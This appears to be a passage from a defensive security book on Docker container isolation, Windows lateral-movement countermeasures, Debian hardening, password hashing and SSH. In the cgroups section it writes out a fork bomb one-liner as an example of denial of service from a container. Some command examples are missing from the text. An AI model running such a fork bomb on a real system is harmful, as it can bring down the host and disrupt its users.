System calls are how programmes access the kernel to perform tasks. This attack surface is huge, and that is all before any security is added on top in the form of LXC, or libcontainer (now opencontainers/runc), or Linux Security Modules (LSM) such as AppArmor or SELinux, which are often seen as an annoyance and just disabled, like many other forms of security.
If you run a container, you may have to install kmod, then run lsmod in the container and also on the host system; you will see that the same modules are loaded. This is because, as mentioned, the container shares the host kernel, so there is not a lot between processes within the container and the host kernel. Considering, as mentioned above, that the processes within the container may also be running as root, it will pay for you to get a good understanding of the security features Docker provides and how to employ them.
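A quick way to convince yourself of the shared kernel, assuming a Debian based image (the image and package manager are placeholders for whatever you run):

```bash
# Module list as seen from inside a container
docker run -it --rm debian bash -c 'apt-get update -qq && apt-get install -y -qq kmod > /dev/null && lsmod | head'

# Module list as seen from the host; the two lists match because the kernel is shared
lsmod | head
```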
The Seccomp section below discusses Docker's attempt to put a stop to some System calls accessing the kernel APIs. There are also many other features that Docker has added or leveraged to mitigate a lot of this potential abuse. So although the situation initially looks bad, Docker has done a lot to improve it.
As you can see in the above image, the host kernel is open to receiving potential abuse from containers. Make sure you keep it patched. We will now walk through many areas of potential abuse. The Countermeasures sections offer information, advice, and techniques for further improving Docker security.
The first place to read for solid background on Linux kernel namespaces is the man page; otherwise I would just have to repeat what is there. A lot of what follows around namespaces requires some knowledge from the namespaces man page, so do yourself a favour and read it first.
Linux kernel namespaces started to be added between 2.6.15 (January 2006) and 2.6.26 (July 2008). According to the namespaces man page, IPC, network and UTS namespace support was available from kernel version 3.0; mount, PID and user namespace support was available from kernel version 3.8 (February 2013); cgroup namespace support was available from kernel version 4.6 (May 2016).
Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
Docker leverages Linux (kernel) namespaces, which provide an isolated workspace: each namespace wraps a global system resource abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource. When a container is run, Docker creates a set of namespaces for that container, providing a layer of isolation between containers:
mnt: (Mount) Provides filesystem isolation by managing filesystems and mount points. The mnt namespace allows a container to have its own isolated set of mounted filesystems. The propagation modes can be one of the following: [r]shared, [r]slave or [r]private, where the r means recursive.

If you run the following command, then the host's mounted host-path is shared with all others that mount host-path. Any changes made to the mounted data will be propagated to those that use the shared propagation mode. Using slave means only the master (host-path) is able to propagate changes, not vice-versa. Using private, which is the default, will ensure no changes can be propagated.
If you omit the host-path, you can see the host path that was mounted by running the following command:

Find the “Mounts” property in the JSON produced. It will have a “Source” and “Destination” similar to:

An empty string for Mode means it is set to its default of read-write. This means, for example, that a container can mount sensitive host system directories such as /, /boot, /etc (as seen in Review Password Strategies), /lib, /proc, /sys, along with the rest discussed in the Lock Down the Mounting of Partitions section, if that advice was not followed. If it was followed, you have some defence in depth working for you: although Docker may have mounted a directory as read-write, the underlying mount may be read-only, thus stopping the container from being able to modify files in these locations on the host system. If the host does not have the above directories mounted with constrained permissions, then we are relying on the user that runs any given Docker container mounting a sensitive host volume to mount it as read-only. For example, after the following command has been run, users within the container can modify files in the host's /etc directory:
Also keep in mind that, by default, the user in the container, unless otherwise specified, is root, and that is the same root user as on the host system.
Labelling systems such as Linux Security Modules (LSM) require that the contents of a volume mounted into a container be labelled. This can be done by adding the z (as seen in the above example) or Z suffix to the volume mount. The z suffix instructs Docker that you intend to share the mounted volume with other containers, and in doing so, Docker applies a shared content label. Alternatively, if you provide the Z suffix, Docker applies a private unshared label, which means only the current container can use the mounted volume. Further details can be found in the dockervolumes documentation. This is something to keep in mind if you are using an LSM and have a process inside your container that is unable to use the mounted data.
--volumes-from allows you to specify a data volume from another container.
You can also mount your Docker container mounts on the host by doing the following:
PID: (Process ID) Provides process isolation, separating container processes from host and other container processes.

The first process created in a new PID namespace is the “init” process, with PID 1, which assumes parenthood of the other processes within the same PID namespace. When PID 1 is terminated, so are the rest of the processes within the same PID namespace.
PID namespaces are hierarchically nested in ancestor-descendant relationships to a depth of up to 32 levels. All PID namespaces have a parent namespace, other than the initial root PID namespace of the host system. That parent namespace is the PID namespace of the process that created the child namespace.
Within a PID namespace, it is possible to access (make system calls to specific PIDs of) all other processes in the same namespace, as well as all processes of descendant namespaces; however, processes in a child PID namespace cannot see processes that exist in the parent PID namespace or further removed ancestor namespaces. The direction in which any process can access another process in an ancestor/descendant PID namespace is one way.
Processes in different PID namespaces can have the same PID, because each PID namespace isolates its PID number space from other PID namespaces.
Docker takes advantage of PID namespaces. Just as you would expect, a Docker container can not access the host system processes, and process ids that are used in the host system can be reused in the container, including PID 1, by being reassigned to a process started within the container. The host system can, however, access all processes within its containers, because, as stated above, PID namespaces are hierarchically nested in parent-child relationships: processes in the host's PID namespace can access all processes in their own namespace, down to the PID namespace that was responsible for starting the process, that is, the process within the container in our case.
The default behaviour can however be overridden to allow a container to access processes within a sibling container, or the host's PID namespace. Example:
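Something like the following; the sibling container name is a placeholder.

```bash
# Share the host's PID namespace: host process IDs become visible under /proc inside the container
docker run -it --rm --pid=host debian ls /proc

# Share another (sibling) container's PID namespace
docker run -it --rm --pid=container:some-sibling debian ls /proc
```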
As an aside, PID namespaces give us the functionality of “suspending/resuming the set of processes in the container and migrating the container to a new host while the processes inside the container maintain the same PIDs” with a handful of commands:
net: (Networking) Provides network isolation by managing the network stack and interfaces. It is also essential in allowing containers to communicate with the host system and other containers. Network namespaces were introduced into the kernel in 2.6.24 (January 2008); with an additional year of development they were considered largely done. The only real concern here is understanding the Docker network modes and communication between containers, which is discussed in the Countermeasures.

UTS: (Unix Timesharing System) Provides isolation of kernel and version identifiers.
UTS is the sharing of a computing resource with many users, a concept introduced in the 1960s/1970s.
A UTS namespace is the set of identifiers returned by uname, which include the hostname and the NIS domain name. Any processes which are not children of the process that requested the clone will not be able to see any changes made to the identifiers of the UTS namespace.
If the CLONE_NEWUTS constant is set, then the process being created will be created in a new UTS namespace, with the hostname and NIS domain name copied and able to be modified independently from the UTS namespace of the calling process.
If the CLONE_NEWUTS constant is not set, then the process being created will be created in the same UTS namespace as the calling process, and thus able to change the identifiers returned by uname.
When a container is created, a UTS namespace is copied (CLONE_NEWUTS is set) by default (--uts=""), providing a UTS namespace that can be modified independently from the target UTS namespace it was copied from.
When a container is created with --uts="host", a UTS namespace is inherited from the host, and the --hostname flag is invalid.
IPC: (InterProcess Communication) Manages access to InterProcess Communications. IPC namespaces isolate your container's System V IPC and POSIX message queues, semaphores, and named shared memory from those of the host and other containers, unless another container specifies on run that it wants to share your namespace. It would be a lot safer if the producer could specify which consuming containers could use its namespace. IPC namespaces do not include IPC mechanisms that use filesystem resources, such as named pipes.
According to the namespaces man page: “Objects created in an IPC namespace are visible to all other processes that are members of that namespace, but are not visible to processes in other IPC namespaces.”
Although sharing memory segments between processes provides Inter-Process Communication at memory speed, rather than through pipes or, worse, the network stack, it produces a significant security concern.
By default a container does not share the host's or any other container's IPC namespace. This behaviour can be overridden to allow a (any) container to reuse another container's or the host's message queues, semaphores, and shared memory via their IPC namespace. Example:
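A sketch of that override, using the same container names referred to below; on newer Docker releases the producer may also need to be started with --ipc=shareable.

```bash
docker run -d --name container-producer debian sleep 3600
docker run -d --name container-consumer --ipc=container:container-producer debian sleep 3600
```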
Now find the Ids of the two running containers:
Now you can see, using the command supplied from the CIS_Docker_1.13.0_Benchmark, that container-consumer is using the IPC namespace of container-producer:
When the last process in an IPC namespace terminates, the namespace will be destroyed along with all IPC objects in the namespace.
user: Not enabled by default. Allows a process within a container to have a unique range of user and group Ids within the container, known as the subordinate user and group Id feature in the Linux kernel, that do not map to the same user and group Ids of the host; container users are remapped to host users. So, for example, if a user within a container is root, which it is by default unless a specific user is defined in the image hierarchy, it will be mapped to a non-privileged user on the host system.

When a container is started with docker run without specifying a cgroup parent, as well as creating the namespaces discussed above, Docker also creates a Control Group (or cgroup) with a set of system resource hierarchies, nested under the default parent docker cgroup, which is also created at container runtime if not already present. You can see how this hierarchy looks in the /sys/fs/cgroup pseudo-filesystem in the Countermeasures section. Cgroups have been available in the Linux kernel since January 2008 (2.6.24), and have continued to be improved. Cgroups track, provide the ability to monitor, and configure fine-grained limitations on how much of any resource a set of processes, or in the case of Docker or pure LXC any given container, can use, such as CPU, memory, disk I/O, and network. Many aspects of these resources can be controlled, but by default, any given container can use all of the system's resources, allowing potential DoS.
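None of these limits apply unless you opt in; a hedged example of doing so with a few of the docker run flags (the values are arbitrary):

```bash
# Constrain memory, CPU weight and the number of processes for a single container
docker run -d --name constrained --memory 256m --cpu-shares 512 --pids-limit 100 debian sleep 3600
```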
Fork Bomb from Container
If an attacker gains access to a container, or in a multi-tenanted scenario where being able to run a container by an arbitrary entity is expected, then by default there is nothing stopping a fork bomb, :(){:|:&};: , launched in a container from bringing the host system down. This is because by default there is no limit to the number of processes a container can run.
According to the Linux man page for capabilities, “Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled” this is on a per thread basis. So root with all capabilities has privileges to do everything. According to the man page, there are currently 38 capabilities.
By default, the following capabilities are available to the default user of root within a container (check the man page for the full descriptions): chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap. The very knowledgeable Dan Walsh, who is one of the experts when it comes to applying least privilege to containers, also discusses these. net_bind_service, for example, allows the superuser to bind a socket to a privileged port (below 1024) if enabled. The Open Container Initiative (OCI) runC specification is considerably more restrictive, only enabling three capabilities: audit_write, kill and net_bind_service.
As stated on the Docker Engine security page: “One primary risk with running Docker containers is that the default set of capabilities and mounts given to a container may provide incomplete isolation, either independently, or when used in combination with kernel vulnerabilities.”
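The incomplete default set can be tightened per container; a common pattern, sketched here with nginx standing in for your own image, is to drop everything and add back only what the workload needs.

```bash
docker run -d --cap-drop=ALL --cap-add=NET_BIND_SERVICE -p 80:80 nginx
```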
A little history to start with: In the early 1990s, Linux was developed as a clone of the Unix Operating system. The core Unix security model which is a form of Discretionary Access Control (DAC) was inherited by Linux. I have provided a glimpse of some of the Linux kernel security features that have been developed since the inception of Linux. The Unix DAC remains at the core of Linux. The Unix DAC allows a subject and/or group of an identity to set the security policy for a specific object, the canonical example being a file, and having a user set the different permissions on who can do what with it. The Unix DAC was designed in 1969, and a lot has changed since then.
Capabilities may or may not be too coarse-grained for your needs; get an understanding of both capabilities and Linux Security Modules (LSMs). Many of the DAC controls can be circumvented by users. Finer-grained control is often required, along with Mandatory Access Control (MAC).
Secure Computing Mode (SecComp) is a security facility that reduces the attack surface of the Linux kernel by reducing the number of System calls that can be made by a process. Any System calls made by the process outside of the defined set will cause the kernel to terminate the process with SIGKILL
. By doing this, the SecComp facility stops a process from accessing the kernel APIs via System calls.
The first version of SecComp was merged into the Linux kernel mainline in version 2.6.12 (March 8 2005). If enabled for a given process, only four System calls could be made: read()
, write()
, exit()
, and sigreturn()
, thus significantly reducing the kernel's attack surface.
In order to enable SecComp for a given process, you would write a 1
to /proc/<PID>/seccomp
. This would cause the one-way transition into the restrictive state.
There have been a few revisions since 2005, such as the addition of the “seccomp filter mode”, which allowed processes to specify which System calls were permitted, followed by the addition of the seccomp() System call in kernel version 3.17 (2014). Along with popular applications such as Chrome/Chromium and OpenSSH, Docker uses SecComp to reduce the attack surface on the kernel APIs.
Docker has disabled about 44 system calls in its default (seccomp) container profile (default.json) out of well over 300 available in the Linux kernel. Docker calls this “moderately protective while providing wide application compatibility”. It appears that ease of use is the first priority. Again, plenty of opportunity here for reducing the attack surface on the kernel APIs, for example the keyctl
System call was removed from the default Docker container profile after vulnerability CVE-2016-0728 was discovered, which allows privilege escalation or denial of service. CVE-2014-3153 is another vulnerability accessible from the futex
System call, which is whitelisted in the default Docker profile.
If you are looking to attack the Linux kernel via its APIs from a Docker container, you have still got plenty of surface area here to play with.
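If you want to shrink that surface area yourself, a hedged sketch (the profile path is a placeholder): Docker lets you supply your own SecComp profile per container, typically a copy of default.json with further System calls removed.
docker run --security-opt seccomp=/path/to/tightened-profile.json -d my-web-image
# conversely, --security-opt seccomp=unconfined removes the default
# filtering entirely, which is what an attacker would prefer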
In order to set-up read-only hosts, physical or VM, there is a lot of work to be done, and in some cases, it becomes challenging to stop an Operating System writing to some files. Remember back to how much work was involved in Partitioning on OS Installation and Lock Down the Mounting of Partitions. In contrast, running Docker containers as read-only is trivial. Check the Countermeasures section.
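A minimal sketch, with the image name and the tmpfs mount as assumptions on my part:
docker run --read-only --tmpfs /tmp -d my-web-image
# the container's root filesystem is mounted read-only; only the
# tmpfs at /tmp (and any explicitly added volumes) remain writable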
Application security is still our biggest weakness. I cover this in many other places, and especially in the Web Applications chapter.
This is exactly what your attackers rely on you doing. Not upgrading out of date software. This is the same concept as discussed in the Web Applications chapter under “Consuming Free and Open Source”. Just do not do it. Stay patched.
There is not a lot to say here, other than make sure you do this. I have personally seen so many disasters that could have been avoided if timely / regular backups had been implemented and tested routinely. I have seen many situations where backup schedules were in place, but they had not been tested for a period of time, and when it came time to use them, they were not available for various reasons. When your infrastructure gets owned, don’t be the one that can not roll back to a known good state.
This is addressed here because so many rely on firewalls to hide many weak areas of defence. The lack of a firewall does not have to be an issue if your services and the communications between them are hardened; in fact, I see it as a goal many of us should have, as it forces us to build better layers of defence.
Revisit the Countermeasures subsection of the first chapter of Fascicle 0.
The following resources are also worth reviewing:
Bringing your VPS(s) in-house provides all the flexibility/power required to mitigate just about all the risks due to outsourcing to a cloud or hosting provider. How easy this will be is determined by how much you already have invested. Cloud offerings are often more expensive in monetary terms for medium to large environments, so as you grow, the cost benefits you may have gained due to quick development up-front will often become an anchor holding you back. Because you may have bought into their proprietary way of doing things, it now becomes costly to migrate, and your younger competitors, which can turn more quickly, out-manoeuvre you. Platform as a Service and serverless technologies often appear even more attractive, but everything comes at a cost; cloud platforms may look good to start with, but often they are too good to be true, and the costs will catch up with you. All that glitters is not gold.
Defence in depth will help here, the attacker should not be in possession of your admin passwords or hashes. If this has already happened, how did it happen? Take the necessary steps to make sure it does not happen again.
Samba is not usually installed on Linux by default, but as we are dealing with Windows here, you do not have the option of whether SMB is installed and running on your machines.
Check the list of requirements for PsExec and turn off / disable what you can.
Try and re-exploit with the provided directions in the Identify Risks section.
Restrict administrative accounts as much as possible, especially network administrator accounts. All users should have the least amount of privilege necessary in order to do their jobs and elevate only when needed. This is why most Linux distributions use sudo.
Consider multi-factor authentication methods for administrators.
How exposed are administrators' machines? Can they be put on a less exposed network segment?
In a Windows network, those that are the most likely to be exploited are administrators. Pay special attention to them and their machines. For example, if an attacker uses the current_user_psexec
module, then once they have access to an administrator's machine, traversal to other machines like Domain Controllers is trivial if the administrator's current login context allows them to access the Domain Controller. Make sure the administrators are aware of this and that they only elevate privileges when it is required and not on their own machines.
Network Intrusion Detection Systems (NIDS) will more than likely not be able to detect the actual passing of the administrators credentials to the target system, because that is how the legitimate SysInternals PsExec behaves, but what a NIDS can be configured to watch for is what happens when the attackers payload executes, for example, it is not normally legitimate behaviour for reverse shells to be sent over the network. Host Intrusion Detection Systems (HIDS) can of course detect the presence of additional and modified files, although these are less commonly run on desktop computers.
Upgrade PowerShell to the latest version.
As above, NIDS can help here. Often these attacks do not leave any files on the disk. Next-generation AV products, such as those that use machine learning, are slowly coming to the market. Most of the products I have seen so far are very expensive though; this should change in time.
Deep Script Block Logging can be enabled from PowerShell v5 onwards. This option tells PowerShell to record the content of all script blocks that it processes; we rely heavily on script blocks with PowerShell attacks. Script Block Logging includes recording of dynamic code generation and provides insight into all the script-based activity on the system, including scripts that are encoded to evade anti-virus and observation by human eyes. This applies to any application that hosts the PowerShell engine: the CLI, ISE, etc.
Script Block Logging records and logs the original obfuscated (XOR, Base64, encryption, etc) script, transcripts, and de-obfuscated code.
Run gpedit.msc -> opens Local Group Policy Editor -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn On PowerShell Script Block Logging -> check the “Enabled” box. By default, each script block is only logged the first time it is run. You can also check the “Log script block invocation start / stop events” check box if you want to log start and stop events every time any script block is invoked. The second option can produce very large amounts of log events though.
This setting may also be accessible from the registry:
Set EnableScriptBlockLogging = 1
at
HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
or
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
I am hoping this goes without saying. Unless you are setting up a Windows server with “all the stuff”, over whose hardening process you have little control (which is why I favour UNIX based servers), you have all the control; if anything goes wrong, it will usually be our own fault for missing or neglecting something. The less you have on your servers, the fewer servers you have, the smaller the network you have, the fewer employees you have; basically, the smaller and lesser of everything you have, the less there is for an attacker to compromise and the quicker you can move.
Much of this section came from a web server I set-up, from install and through the hardening process.
There are often a few services you can disable even on a bare bones Debian install and some that are just easier to remove. Then go through the process of hardening what is left. Make sure you test before and after each service you disable, remove or harden, watch the port being opened/closed, etc. Remember, the less you have, the less there is to be exploited.
By creating many partitions and applying the least privileges necessary to each in order to be useful, you are making it difficult for an attacker to carry out many malicious activities that they would otherwise be able to.
This is a similar concept to tightly constraining input fields to only be able to accept structured data (names (alpha only), dates, social security numbers, zip codes, email addresses, etc) rather than just leaving the input wide open to be able to enter any text as discussed in the Web Applications chapter under What is Validation.
The way I’d usually set up a web server's partitions is as follows. Delete all the current partitions and add the following. /
was added to the start and the rest to the end, in the following order: /
, /var/log
(optional, but recommended), /var/tmp
(optional, but recommended), /var
, /tmp
, /opt
, /usr/share
(optional, but recommended), /usr
, /home
, swap
.
You will notice in the Lock Down the Mounting of Partitions section, that I ended up adding additional partitions (mentioned in the previous paragraph) to apply finer-grained control on directories often targeted by attackers. It is easier to add those partitions here; we will add options to them in the Lock Down section.
If you add the “optional, but recommended” partitions, then they may look more like the following after a df -h
:
The sizes should be set-up according to your needs. If you have plenty of RAM, make your swap
small; if you have minimal RAM (barely, if at all, sufficient), you could double the RAM size for your swap
. It is usually a good idea to think about what mount options you want to use for your specific directories. This may shape how you set-up your partitions. For example, you may want to have options nosuid
,noexec
on /var
but you can’t because there are shell scripts in /var/lib/dpkg/info
so you could set-up four partitions. /var
without nosuid
,noexec
and /var/tmp
, /var/log
, /var/account
with nosuid
,noexec
. Look ahead to the Mounting of Partitions section for more details, or just wait until you get to it.
You can think about changing /opt
(static data) to mount read-only in the future as another security measure if you like.
If you want to:
I recommend using apt-cacher-ng, installable with an apt-get
, you will have to set this up on a server, by modifying the /var/apt-cacher-ng/acng.conf
file to suit your environment. There is ample documentation. Then add the following file to each of your Debian-based machines.
/etc/apt/apt.conf
with the following contents and set its permissions to be the same as your sources.list:
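A hedged example of what that one line could look like, assuming apt-cacher-ng is listening on its default port of 3142 and with the server address as a placeholder:
Acquire::http::Proxy "http://your-apt-cacher-ng-server:3142";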
Now just replace the apt proxy references in the /etc/apt/sources.list
of your consuming servers with the internet mirror you want to use, so we contain all the proxy related config in one line in one file. This will allow the requests to be proxied and packages cached via the apt cache on your network when requests are made to the mirror of your choosing.
Update the list of packages then upgrade them with the following command line. If you are using sudo, you will need to add that to each command:
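Assuming plain apt-get (prefix each command with sudo if needed), that looks like:
apt-get update && apt-get upgrade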
Now if you’re working through an installation, you’ll be asked for a mirror to pull packages from. If you have the above apt caching server set-up on your network, this is a good time to make it work for you. You’ll just need to enter the caching server's IP address and port.
A lot of the following you will have to follow along with on your VPS in order to understand what I am saying.
Make sure passwords are encrypted with an algorithm that will stand up to the types of attacks and hardware you anticipate that your attackers will use. I have provided additional details around which Key Derivation Functions are best suited to which types of hardware in the “Which KDF to use” section within the Web Applications chapter.
In most cases you will want to shadow your passwords. This should be the default in most, or all recent Linux distributions.
How do you know if you already have the Shadow Suite installed? If you have a /etc/shadow
file, take a look at the file and you should see your user and any others with an encrypted value following it. There will be a reference to the password from the /etc/passwd
file, where the password is represented by a single x
(discussed below). If the Shadow Suite is not installed, then your passwords are probably stored in the /etc/passwd
file.
Crypt, crypt 3 or crypt(3) is the Unix C library function designed for password authentication. The following table shows which Operating Systems have out of the box support, and which hashing functions or key derivation functions are supported. We discuss this table in a moment, so don’t worry just yet if you do not understand it all:
It may be worth looking at and modifying the /etc/shadow
file. Consider changing the “maximum password age” and “password warning period”. Consult the man page for shadow for full details. Check that you are happy with which encryption algorithms are currently being used. The files you will need to look at are: /etc/shadow
and /etc/pam.d/common-password
. The man pages you will probably need to read in conjunction with each other are the following:
Out of the box, crypt (glibc) supports MD5, SHA-256 and SHA-512. I wouldn’t bother looking at DES, and MD5 is common but weak. You can also use the blowfish cipher via the bcrypt KDF with a little more work (a few minutes). The default of SHA-512 (in Debian) enables salted passwords. The SHA family of hashing functions is too fast for password hashing. Crypt applies key stretching to slow brute-force cracking attempts down. The default number of rounds has not changed in at least 9 years, so it is well worth modifying the number to keep up with hardware advancements. OWASP provides some guidance on working out what the factor should be, referenced in the MembershipReboot section in the Web Applications chapter. The default number of rounds are as follows:
The OWASP advice says we should double the rounds every subsequent two years. So for the likes of SHA in 2007 having 5000 rounds, we should be looking at increasing this to 160000
in the year 2017, so if you are still with the default, you are a long way behind and it is time to do some serious key stretching.
How can you tell which algorithm you are using, salt size, number of iterations for the computed password, etc? The crypt 3 man page explains it all. By default a Debian install will be using SHA-512 which is better than MD5 and the smaller SHA-256. Don’t take my word for it though, just have a look at the /etc/shadow
file. I explain the file format below.
Now by default I did not have a “rounds” option in my /etc/pam.d/common-password
module-arguments. Having a large iteration count (number of times the encryption algorithm is run (key stretching)) and an attacker not knowing what that number is, will slow down a brute-force attack.
You can increase the rounds
by overriding the default in /etc/pam.d/common-password
. You override the default by adding the rounds field and the value you want to use, as seen below.
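A hedged example of what the modified pam_unix line in /etc/pam.d/common-password could look like on Debian; your existing module-arguments may differ slightly, and the rounds value is the 2017 figure discussed above:
password [success=1 default=ignore] pam_unix.so obscure sha512 rounds=160000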
Next time someone changes their password (providing the account is local), the specified number of rounds will be used.
I would suggest adding this and re-creating your passwords now. Just before you do, it is usually a good idea to be logged in at an extra terminal and possibly a root terminal as well, until you are sure you can log in again. It just makes things easier if for whatever reason you can no longer log in at a new terminal. Now… as your normal user run:
passwd
providing your existing password then your new one twice. You should now be able to see your password in the /etc/shadow
file with the added rounds
parameter.
Also have a check in /var/log/auth.log
. Reboot and check you can still log in as your normal user. If all is good, do the same with the root account.
Let’s have a look at the passwd
and shadow
file formats.
: is a separator in both /etc/shadow and /etc/passwd files:
you is the account username.
$id$salt$hashedpassword is generally considered to be called the encrypted password, although this is made up of three base fields separated by the $. The id can be any of the Scheme ids that crypt supports, as shown in the above table. How the rest of the substrings in this field are interpreted is determined by what is found in the id field. The salt can be up to 16 characters. In saying that, the salt can be augmented by prepending the rounds=<number of rounds, sourced from /etc/pam.d/common-password>$ directive. The hashed part of the password string is the actual computed password. The size of this string is fixed as per the below table:
The rest of the fields are as per below.
daemon is the account username.
* is the place where the salt and hashed password would go; the asterisk means that this account can not be used to log in.
15980 is the number of days from the Unix “epoch” (1970-1-1) to when the password was changed.
0 is the minimum password age, or the number of days that the user will have to wait before they will be allowed to change their password. An empty field or 0 means that there is no minimum.
99999 is the maximum number of days until the user will be forced to change their password. 99999 or an empty value means that there is no limit to the maximum age that the password should be changed. If the maximum password age is lower than the minimum password age (No. 4) the user can not change their password.
7 is the password warning period. An empty value or 0 means that there is no warning period.
The format of the /etc/passwd file is as follows:
root and you are the account usernames.
x is the placeholder for password information. The password is obtained from the /etc/shadow file.
0 or 1000 is the user Id; the root user always has an Id of 0.
0 or 1000 is the primary group Id for the user; the root user always has a primary group Id of 0.
root or you,,, is the comment field. This field can be used to describe the user or the user's function. This could be used for contact details, or maybe what the account is used for.
/root or /home/you is the user's home directory. For regular users, this would usually be /home/[you]. For root, this is /root.
/bin/bash is the user's default shell.
You should find this fairly straight forward on a Debian server. In order to use bcrypt with slowpoke blowfish, which is currently the best (very slow) algorithm available for hashing passwords (obvious from the number of iterations applied by default as noted above: 64 rounds, as opposed to MD5's 1000 rounds and SHA's 5000 rounds from 2007):
Install libpam-unix2, then in /etc/pam.d/ change all references to pam_unix.so to pam_unix2.so in the relevant files, and replace the existing hashing scheme (sha512) with blowfish.
Passwords that are updated after these modifications are made will be computed using blowfish. Existing shadow passwords are not modified until you change them. So you need to change them immediately (one at a time to start with please. Leave root till last) if you expect them to be using the bcrypt KDF. Do this the same way we did above with the passwd
command.
Something to be aware of: if the version of libpam-unix2 that you just installed does not support the existing crypt scheme used to create an existing user's password, that user may not be able to log in. You can get around this by having root create a new password for that user, because passwd will not ask root for that user's existing password.
Consider setting a password for GRUB, especially if your server is directly on physical hardware. If it is on a hypervisor, an attacker has another layer to go through before they can access the guest's boot screen.
There are a handful of files to check and/or modify in terms of disabling root logins.
/etc/pam.d/login
pam_securetty.so
module. When this file, along with the next one, is properly configured, and root tries to login on an insecure console (that is, one that is not listed in the next file), they will not be prompted for a password and will instead receive a message like the following:
pam_securetty(login:auth): access denied: tty '/dev/tty1' is not secure
Login incorrect
Also make sure the following line has the nullok text removed from it:
auth required pam_unix.so nullok
/etc/inittab
. A better practice is to only allow low privilege users access to terminals and then elevate privileges once logged in:
auth requisite pam_securetty.so
/etc/securetty
cat /dev/null > /etc/securetty
/etc/inittab
/etc/security/access.conf
pam_access
module and make modifications to this file. Currently everything is commented out by default. Enabling this module and configuring it allows for finer-grained access control, but log messages are lacking. I usually don’t touch this module.
Now test that you are unable to log into any of the text terminals (TeleTYpewriter, tty) listed in /etc/inittab
. Usually these can be accessed by [Ctrl]+[Alt]+[F[1, 2, 3, …]] if you are dealing with a physical machine. If you are dealing with a hypervisor, attempt to log in to the guest's console via the hypervisor management UI as root (vSphere Client in the case of VMware ESX(i)). You should no longer be able to.
Make sure that if your server is not physical hardware, but is a VM, then the host's password is long and consists of a random mix of upper case, lower case, numbers, and special characters.
We covered fingerprinting of SSH under the Reconnaissance section of the Processes and Practises chapter in Fascicle 0. Here we will discuss:
First of all, make sure you are using SSH version 2. Version 1 and its progressions have well documented known vulnerabilities. Version 2 has none at the time of writing this. You can confirm this in multiple ways. The two simplest techniques are as follows:
Protocol
field of /etc/ssh/sshd_config
on your server, it should say 2
, as in Protocol 2
ssh -1 you@your_server
Protocol major versions differ: 1 vs. 2
ssh -2 you@your_server
Often referred to as “secret key” or “shared secret” encryption. In the case of Symmetrical encryption, typically only a single key is required for both ends of the communication, or a pair of keys in which a simple transformation is required to establish the relationship between them (not to be confused with how Diffie-Hellman (asymmetric) parties establish their secret keys). The single key should be kept secret by the parties involved in the conversation. This key can be used to both encrypt and decrypt messages.
Some of the commonly used and well known ciphers used for this purpose are the following:
The algorithm selected to be used for encrypting the connection is decided by both the client and server, both must support the chosen cipher. Each is configured to work their way through a list from most preferred to least preferred. Entering man ssh_config
into a terminal will show you the default order for your distribution.
Also known as public-key or key-pair encryption, utilises a pair of keys, one which is public and one which by design is to be kept private. You will see where this is used below when we set-up the SSH connection. Below are the most commonly used public-key algorithms:
Also known as message digests and one-way encryption algorithms. Hash functions create a fixed-length hash value based on the plain-text. Hash functions are often used to determine the integrity of a file, message, or any other data.
If a given hash function is run on a given message twice, the resulting hash value should be identical. Modifying any part of the message has a very high chance of creating an entirely different hash value.
Any given message should not be able to be re-created from the hash of it.
When the symmetric encryption negotiation is being carried out, a Message Authentication Code (MAC) algorithm is selected from the client's default list of MACs; the first one that is supported on the server is used. You can see the default list by entering man ssh_config
into a terminal.
Once the encryption properties are chosen as detailed below in the first step of SSH Connection Procedure, each message sent must contain a MAC, so that the receiving party can verify the integrity of the message. The MAC is the result of:
The MAC is sent as the last part of the binary packet protocol.
The two main stages of establishing the connection are:
The following are the details for each:
Establish the session encryption
The SSH client is responsible for initiating the TCP handshake with the server. The server responds with the protocol versions it supports, and if the client can support one of the protocol versions from the server, the process continues. The server also provides its public (asymmetric) host key. The client verifies that the server is known to it, by checking that the public host key sent from the server is in the client's:
~/.ssh/known_hosts
This record is added on first connection to the server, as detailed in the section “Establishing your SSH Servers Key Fingerprint” below.
At this stage, a session key is negotiated between the client and server using Diffie-Hellman (DH) as an ephemeral (asymmetric) key exchange algorithm, each combining their own private data with public data from the other party, which allows both parties to arrive at the identical secret symmetric session key. The public and private key pairs used to create the shared secret key in this stage have nothing to do with the client authenticating to the server.
Now in a little more detail, the Diffie-Hellman key agreement works like this:
Authenticate the client to the server
The second stage is to authenticate the client, establishing whether they should be communicating with the server. There are several methods for doing this, the two most common are passwords and key-pair. SSH defaults to passwords, as the lowest common denominator, plus it often helps to have password authentication set-up in order to set-up key-pair authentication, especially if you don’t have physical access to the server(s).
SSH key pairs are asymmetric. The server holds the client's public key and uses it to encrypt messages that it uses to authenticate the client. The client in turn receives the messages from the server and decrypts them with the private key. If the public key falls into the wrong hands, it’s no big deal, because the private key can not be deduced from the public key, and all the authentication public key is used for is verifying that the client holds the private key for it.
The authentication stage continues directly after the encryption has been established from the previous step.
The server checks its ~/.ssh/authorized_keys file for the Id of the public key's account that the client is authenticating as. If a matching Id is found in ~/.ssh/authorized_keys, the server creates a random number and encrypts it with the public key that had a matching Id.
Below in the Key-pair Authentication section, we work through manually (hands on) setting up key-pair authentication.
When you connect to a remote host via SSH that you have not established a trust relationship with before, you are going to be told that the authenticity of the host you're attempting to connect to can not be established.
Do you type yes to continue without actually knowing that it is the host you think it is? Well, if you do, you should be more careful. The fingerprint that is being put in front of you could be from a Man In the Middle (MItM). You can query the target (from “its” shell of course) for the fingerprint of its key easily. On Debian you will find the keys in /etc/ssh/
When you enter the following:
ls /etc/ssh/
you should get a listing that reveals the private and public keys. Run the following command on the appropriate key to reveal its fingerprint.
For example if SSH is using rsa:
ssh-keygen -lf ssh_host_rsa_key.pub
For example if SSH is using dsa:
ssh-keygen -lf ssh_host_dsa_key.pub
If you try the command on either the private or public key you will be given the public key's fingerprint, which is exactly what you need for verifying the authenticity from the client side.
